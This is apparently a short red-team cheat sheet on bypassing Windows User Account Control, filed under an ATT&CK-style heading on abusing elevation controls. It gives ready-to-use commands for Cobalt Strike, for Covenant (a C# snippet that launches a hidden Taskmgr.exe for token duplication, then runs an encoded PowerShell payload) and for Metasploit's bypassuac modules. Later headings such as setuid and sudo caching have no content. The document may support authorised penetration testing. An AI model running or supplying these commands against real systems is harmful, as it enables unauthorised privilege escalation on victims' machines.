Abuse Elevation Control Mechanism

Bypass User Account Control

CS:

beacon> elevate uac-token-duplication localhost-beacon-name

Covenant:

Create a hidden instance of an auto-elevating process (e.g. Taskmgr.exe or wusa.exe) to duplicate and impersonate its token and then bypass UAC:

SharpShell /code:"var startInfo = new System.Diagnostics.ProcessStartInfo { FileName = @\"C:\Windows\System32\Taskmgr.exe\", WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden }; var taskmgr = new System.Diagnostics.Process { StartInfo = startInfo }; taskmgr.Start(); return taskmgr.Id.ToString();"
BypassUACCommand cmd.exe "/c powershell -enc <blah>"

Metasploit:

Several bypassuac modules exist under exploit/windows/local/. E.g.:

search bypassuac
use exploit/windows/local/bypassuac
set session 1
exploit

Elevated Execution with Prompt

Setuid and Setgid

Sudo and Sudo Caching